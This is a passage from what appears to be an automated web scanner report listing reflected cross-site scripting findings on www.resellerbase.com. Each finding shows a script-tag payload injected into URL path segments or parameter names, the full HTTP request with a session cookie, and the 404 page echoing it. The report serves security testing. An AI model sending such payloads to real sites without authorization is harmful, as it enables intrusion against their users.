Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22/themesb2356<script>alert(1)</script>252c7fac28c/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.1771. http://www.resellerbase.com/detail/22/themes/kosmos/images/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/22/themes/kosmos/images/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 43595<script>alert(1)</script>68b5e95bfe7 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/22/themes/kosmos43595<script>alert(1)</script>68b5e95bfe7/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22/themes/kosmos43595<script>alert(1)</script>68b5e95bfe7/images/ was not found on this server.</p>
...[SNIP]...

2.1772. http://www.resellerbase.com/detail/22/themes/kosmos/images/ [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/22/themes/kosmos/images/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload f1914<script>alert(1)</script>cc84f141254 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/22/themes/kosmos/imagesf1914<script>alert(1)</script>cc84f141254/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22/themes/kosmos/imagesf1914<script>alert(1)</script>cc84f141254/ was not found on this server.</p>
...[SNIP]...

2.1773. http://www.resellerbase.com/detail/22/themes/kosmos/images/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/22/themes/kosmos/images/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 44019<script>alert(1)</script>c9a50a39329 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/22/themes/kosmos/images/?44019<script>alert(1)</script>c9a50a39329=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22/themes/kosmos/images/?44019<script>alert(1)</script>c9a50a39329=1 was not found on this server.</p>
...[SNIP]...

2.1774. http://www.resellerbase.com/detail/22/themes/kosmos/images/rating/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/22/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 31e76<script>alert(1)</script>d82da2def56 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail31e76<script>alert(1)</script>d82da2def56/22/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail31e76<script>alert(1)</script>d82da2def56/22/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.1775. http://www.resellerbase.com/detail/22/themes/kosmos/images/rating/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/22/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 43b68<script>alert(1)</script>479e1135488 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/2243b68<script>alert(1)</script>479e1135488/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/2243b68<script>alert(1)</script>479e1135488/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.1776. http://www.resellerbase.com/detail/22/themes/kosmos/images/rating/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/22/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 7acf8<script>alert(1)</script>38db77fc81 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/22/themes7acf8<script>alert(1)</script>38db77fc81/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22/themes7acf8<script>alert(1)</script>38db77fc81/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.1777. http://www.resellerbase.com/detail/22/themes/kosmos/images/rating/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/22/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 40795<script>alert(1)</script>f7eea42d9cf was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/22/themes/kosmos40795<script>alert(1)</script>f7eea42d9cf/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22/themes/kosmos40795<script>alert(1)</script>f7eea42d9cf/images/rating/ was not found on this server.</p>
...[SNIP]...

2.1778. http://www.resellerbase.com/detail/22/themes/kosmos/images/rating/ [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/22/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 28e99<script>alert(1)</script>aa2a1e37351 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/22/themes/kosmos/images28e99<script>alert(1)</script>aa2a1e37351/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22/themes/kosmos/images28e99<script>alert(1)</script>aa2a1e37351/rating/ was not found on this server.</p>
...[SNIP]...

2.1779. http://www.resellerbase.com/detail/22/themes/kosmos/images/rating/ [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/22/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 1c119<script>alert(1)</script>d07010ee153 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/22/themes/kosmos/images/rating1c119<script>alert(1)</script>d07010ee153/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22/themes/kosmos/images/rating1c119<script>alert(1)</script>d07010ee153/ was not found on this server.</p>
...[SNIP]...

2.1780. http://www.resellerbase.com/detail/22/themes/kosmos/images/rating/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/22/themes/kosmos/images/rating/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload d15f3<script>alert(1)</script>3b0146b4577 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/22/themes/kosmos/images/rating/?d15f3<script>alert(1)</script>3b0146b4577=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22/themes/kosmos/images/rating/?d15f3<script>alert(1)</script>3b0146b4577=1 was not found on this server.</p>
...[SNIP]...

2.1781. http://www.resellerbase.com/detail/22/themes/kosmos/images/rating/0.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/22/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3bb28<script>alert(1)</script>23d0706cb38 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail3bb28<script>alert(1)</script>23d0706cb38/22/themes/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:32:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail3bb28<script>alert(1)</script>23d0706cb38/22/themes/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.1782. http://www.resellerbase.com/detail/22/themes/kosmos/images/rating/0.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/22/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 92ebc<script>alert(1)</script>33952bd1623 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/2292ebc<script>alert(1)</script>33952bd1623/themes/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:33:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/2292ebc<script>alert(1)</script>33952bd1623/themes/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.1783. http://www.resellerbase.com/detail/22/themes/kosmos/images/rating/0.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/22/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a398c<script>alert(1)</script>576f1a05cdf was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/22/themesa398c<script>alert(1)</script>576f1a05cdf/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:33:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22/themesa398c<script>alert(1)</script>576f1a05cdf/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.1784. http://www.resellerbase.com/detail/22/themes/kosmos/images/rating/0.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/22/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c3843<script>alert(1)</script>77f4bec3cc was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/22/themes/kosmosc3843<script>alert(1)</script>77f4bec3cc/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:33:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22/themes/kosmosc3843<script>alert(1)</script>77f4bec3cc/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.1785. http://www.resellerbase.com/detail/22/themes/kosmos/images/rating/0.gif [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/22/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload e9b14<script>alert(1)</script>638d3784f27 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/22/themes/kosmos/imagese9b14<script>alert(1)</script>638d3784f27/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:33:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22/themes/kosmos/imagese9b14<script>alert(1)</script>638d3784f27/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.1786. http://www.resellerbase.com/detail/22/themes/kosmos/images/rating/0.gif [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/22/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 1d57b<script>alert(1)</script>9c3c9d003c was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/22/themes/kosmos/images/rating1d57b<script>alert(1)</script>9c3c9d003c/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:34:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22/themes/kosmos/images/rating1d57b<script>alert(1)</script>9c3c9d003c/0.gif was not found on this server.</p>
...[SNIP]...

2.1787. http://www.resellerbase.com/detail/22/themes/kosmos/images/rating/0.gif [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/22/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 4af16<script>alert(1)</script>c2df711339d was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/22/themes/kosmos/images/rating/0.gif4af16<script>alert(1)</script>c2df711339d HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:34:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22/themes/kosmos/images/rating/0.gif4af16<script>alert(1)</script>c2df711339d was not found on this server.</p>
...[SNIP]...

2.1788. http://www.resellerbase.com/detail/22/themes/kosmos/images/rating/0.gif [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/22/themes/kosmos/images/rating/0.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload bb478<script>alert(1)</script>66462e2cb52 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/22/themes/kosmos/images/rating/0.gif?bb478<script>alert(1)</script>66462e2cb52=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:32:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22/themes/kosmos/images/rating/0.gif?bb478<script>alert(1)</script>66462e2cb52=1 was not found on this server.</p>
...[SNIP]...

2.1789. http://www.resellerbase.com/detail/22/themes/kosmos/images/rating/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/22/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 78bed<script>alert(1)</script>5b9b98f1537 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail78bed<script>alert(1)</script>5b9b98f1537/22/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/22/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
